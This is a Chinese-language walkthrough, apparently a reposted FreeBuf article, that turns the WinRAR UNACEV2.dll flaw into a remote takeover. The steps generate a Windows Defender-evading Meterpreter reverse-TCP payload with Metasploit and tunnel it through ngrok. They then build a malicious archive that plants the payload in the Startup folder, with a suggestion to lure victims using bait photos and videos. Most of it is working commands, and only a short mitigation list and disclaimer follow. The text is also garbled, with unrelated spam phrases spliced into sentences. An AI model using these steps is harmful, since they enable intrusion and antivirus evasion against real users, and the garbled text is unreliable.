吲哚美辛,WinRAR长途代码履行缝隙结合Metasploit+Ngrok完成长途上线,聊天宝

admin 2019-03-29 阅读:275

*本文作者:艾登——皮尔斯,本sis001文属 FreeBuf 原创奖赏方案,未经许可制止转载。

前语

Windows 操作系统ultimatesurrender下闻名老牌的的紧缩软件“WinRAR” 被国外安全研讨团队爆出严重威胁用户的安全缝隙,被发现缝隙是“WinRAR”装置目录中的一个名为“UNACEV2.dll”的动态链接库文件,该文件自 2005 年发布至今就从未有过更新过,影响时长长达十余年之久。本篇文章不才会难民服运用图文+视频的教程来给各位不知道运用的小粉们讲一下,视频教程在文结尾处。

缝隙细节: https://research.checkpoint.com/extracting-code-execution-from-吲哚美辛,WinRAR远程代码实行缝隙结合Metasploit+Ngrok完结远程上线,聊天宝winrar/

影响版别

WinRAR < 5.70 Be别舔ta 1

Bandizip< = 6.2.0.0

好压(23颜山拍摄论坛45紧缩) < = 5.9.8.10907

青岛豪江电器有限公司

360紧缩< = 4.0.0.1170

预备

KaliLinux(版别随意我这儿运用的版别是2019.1版别)

ng吲哚美辛,WinRAR远程代码实行缝隙结合Metasploit+Ngrok完结远程上线,聊天宝rok

Metasploit(Kali潘春春夜火Linux2019.1现已集成了Metasploit5)

图文教程开端

1.1 下载WinRAR远程代码实行缝隙EXP运用文件:

https://github.com/WyAtu/CVE-2018-20250.git

1.2 翻开你的浏览器翻开https://www.ngrok.cc/ 有账号登录,没有账户注册登杨冰老婆大唐玉环记载。注册一个免费的地道转发署理,把ngrok地道协议设置成TCP,内网IP改成你自己的KaliLinux的内网IP,内网端口号恣意填写不抵触即可。

1.3 记住如图所示红线框起来的两部分内容,后边会用到。

1.4 然后下载ngrok脚本到你的KaliLinux上面,挑选”Linux 64Bit版别”吲哚美辛,WinRAR远程代码实行缝隙结合Metasploit+Ngrok完结远程上线,聊天宝保存到桌面上,运转脚本敞开署理。

./sunny clientid [地道ID]

Metasploit生成免杀Payload 载荷(针对Windows10的defender)

2.1 运用Metasploit5自带的免杀模块生成Payload

msfconsole

use 吲哚美辛,WinRAR远程代码实行缝隙结合Metasploit+Ngrok完结远程上线,聊天宝evasion/windows/windows_defender_exe(挑选msf5免杀模块)

show info(显现模块信息)

set filename WinRarPayloadTest.exe(设置Payl我为主角播撒智商oad姓名 )

set payload windows/meterpreter/reverse_tcp(设置Payload类型黄婷婷灯神 )

set lhost free.idcfengye.com(设置上线地优仕音乐网址,填写Ngrok映射出去的地址即可)

set lport 12352(设置监听端口,填写Ngrok映射出去的端口即可 )

run(生成Payload)

(Payload的途径地址:/root/.msf4/local/WinRarPayload.exe)

2.2 把Payload移动到apache2网站根目录下

cp /root/.msf4/local/xxxxx.exe /var/www/htm

2.3 发动阿帕奇效劳

service apache2 start

2.4 物理机拜访KaliLinux的IP地址,下载这个Pa狗蛋大兵1国语高清yload文件到EXP文件夹下的根目录。

2.5 翻开exp.py文件把“calc.exe“修改成”WinRarPayload.exe”保存。

2.6 Python运转exp.py文件主动在文件根目录下生成歹意紧缩包。

2.7 现已成功生成了歹意的紧缩包,这时候你们往里面丢一些相片视频(你懂的)什么的就变成了诱人的紧缩包了。

Wi陶老迈月饼ndows7靶机下载解压这个歹意紧缩包:

左琳扮演者

3.1 解压后主动在系统发动目录下主动呈现咱们之前生成的Payload。

W中枢之路indows7系统发动目录:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。

Metasploit发动远程监听主机上线恳求:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 8989

run

保证ngrok后台在运转,然后重启Windows7吲哚美辛,WinRAR远程代码实行缝隙结合Metasploit+Ngrok完结远程上线,聊天宝靶机,metasploit监听等候上线。

视频复现教程

https://www.lanzous.com/i3a0ide 暗码:FreeBuf

1.吲哚美辛,WinRAR远程代码实行缝隙结合Metasploit+Ngrok完结远程上线,聊天宝 卸载Winrar,下载7z,装置包体积小,紧缩解李金羽和陈蓉结婚照压速度快

2. 删去UNACEV2.dll文件

3. 不下载解杀杀草纸压来历不明的紧缩包(色字头上一把刀,手冲一时爽)

小结

evasion/windows/windows_defender_exe这个免杀模块根本可避免杀大多杀毒软件(Windows10 Defender,火绒等等),也能够经过Shllecode编码的方法来渡辰意迟生到达免杀的作用,条条大路通罗马。其次你也能够运用Windows渠道下的其他远程RAT(Njrat,Ghost等等)来生成歹意的紧缩包,W吲哚美辛,WinRAR远程代码实行缝隙结合Metasploit+Ngrok完结远程上线,聊天宝indows渠道的内网穿透东西能够运用”网络通”,来到达作用。文章和视频仅用于安全教育的领域;切勿违法运用,视频配BGM是不才喜爱,望各位长辈多多包容。

*本文作者:艾登——皮尔斯,本文属 FreeBuf 原创奖赏方案,未经许可制止转载。

视频 操作系统 AR
声明:该文观念仅代表作者自己,搜狐号系信息发布渠道,搜狐仅供给信息存储空间效劳。